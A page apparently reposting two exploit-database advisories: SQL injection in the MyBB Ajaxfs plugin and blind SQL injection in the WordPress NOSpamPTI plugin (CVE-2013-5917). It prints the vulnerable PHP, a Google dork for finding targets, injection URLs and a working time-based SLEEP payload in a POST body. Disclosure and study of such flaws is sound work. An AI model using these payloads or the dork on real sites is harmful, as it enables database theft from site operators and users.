[webapps] - MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability

############################ Mybb Ajaxfs Plugin Sql Injection vulnerability############################################################## @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@###################################### # Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability # Author : Iranian Exploit DataBase # Discovered By : IeDb # Email : [email protected] - [email protected] # Home : http://iedb.ir - http://iedb.ir/acc # Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538 # Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2 # Security Risk : High # Tested on : Linux # Dork : inurl:ajaxfs.php ################################# 1) if(isset($_GET['tooltip'])) { $pid=$_GET['tooltip']; $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'"); 2) if(isset($_GET['usertooltip'])) { $uid=$_GET['usertooltip']; $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'"); http://localhost/Upload/ajaxfs.php?usertooltip=1' 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 Google DORK : inurl:ajaxfs.php # Exploit : # http://site.com/mybb/ajaxfs.php?tooltip=[sql] # http://site.com/mybb/ajaxfs.php?usertooltip=[sql] ################################# # Tnx To : All Member In Iedb.ir/acc & Iranian Hackers #################################

View the original article here

[webapps] - Wordpress NOSpamPTI Plugin - Blind SQL Injection

[ NOSpamPTI Wordpress plugin Blind SQL Injection ][ Vendor product description ]NOSpamPTI eliminates the spam in your comment box so strong and free,developed from the idea of Nando Vieira http://bit.ly/d38gB8, but some themes do not supportchanges to the functions.php to this we alter this function andavailable as a plugin. Make good use of this plugin and forget all the Spam.[ Bug Description ]NOSpamPTI contains a flaw that may allow an attacker to carry out aBlind SQL injection attack. The issue is due to the wp-comments-post.phpscript not properly sanitizing the comment_post_ID in POST data. Thismay allow an attacker to inject or manipulate SQL queries in theback-end database, allowing for the manipulation or disclosure ofarbitrary data.[ History ]Advisory sent to vendor on 09/09/2013Vendor reply 09/20/2013. According the vendor, the plugin was deprecated.[ Impact ]HIGH[ Afected Version ]2.1[ CVE Reference]CVE-2013-5917[ POC ]Payload:POST /wordpress/wp-comments-post.phpauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1AND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1[ Vulnerable code ]$post_id = $_POST['comment_post_ID'];load_plugin_textdomain('nospampti',WP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/'); if ($hash != $challenge) { $wpdb->query("DELETE FROM {$wpdb->comments} WHERE comment_ID ={$comment_id}"); $count = $wpdb->get_var("select count(*) from $wpdb->commentswhere comment_post_id = {$post_id} and comment_approved = '1'");[ Reference ][1] No SpamPTI SVN repository -http://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php[2] Owasp - https://owasp.org/index.php/SQL_Injection[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/--------------------------------------------iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos

View the original article here